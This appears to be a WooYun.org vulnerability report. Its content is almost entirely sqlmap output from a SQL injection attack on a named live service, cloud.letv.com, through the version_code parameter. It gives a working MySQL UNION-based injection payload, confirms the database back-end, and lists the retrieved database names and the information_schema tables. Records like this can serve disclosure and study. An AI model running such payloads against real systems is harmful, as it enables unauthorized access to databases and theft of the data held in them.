WooYun.org

http://cloud.letv.com/ledisk//appupdate/index?v ersion_code=1003&channel=wandoujia

Place: GET
Parameter: version_code
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: version_code=1003 UNION ALL SELECT NULL,CONCAT(0x71756b7171,0x52655
371416d78426d68,0x716c6e6971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#&channel=wandou
jia
---
[22:19:38] [INFO] testing MySQL
[22:19:38] [INFO] confirming MySQL
[22:19:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:19:38] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\cloud.letv.com'
[*] shutting down at 22:19:38

---
[22:30:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[22:30:44] [INFO] fetching database names
[22:30:45] [INFO] the SQL query used returns 2 entries
[22:30:45] [INFO] retrieved: "information_schema"
[22:30:45] [INFO] retrieved: "ledisk"
available databases [2]:
[*] information_schema
[*] ledisk
[22:30:45] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\cloud.letv.com'
[*] shutting down at 22:30:45

Database: information_schema
[65 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| CLIENT_STATISTICS                     |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_TEMPORARY_TABLES               |
| GLOBAL_VARIABLES                      |
| INDEX_STATISTICS                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_PAGES              |
| INNODB_BUFFER_POOL_PAGES_BLOB         |
| INNODB_BUFFER_POOL_PAGES_INDEX        |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CHANGED_PAGES                  |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_INDEX_STATS                    |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_RSEG                           |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_STATS                      |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESTATS                 |
| INNODB_TABLE_STATS                    |
| INNODB_TRX                            |
| INNODB_UNDO_LOGS                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| QUERY_RESPONSE_TIME                   |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLE_STATISTICS                      |
| TEMPORARY_TABLES                      |
| THREAD_STATISTICS                     |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| USER_STATISTICS                       |
| VIEWS                                 |
| XTRADB_ADMIN_COMMAND                  |
+---------------------------------------+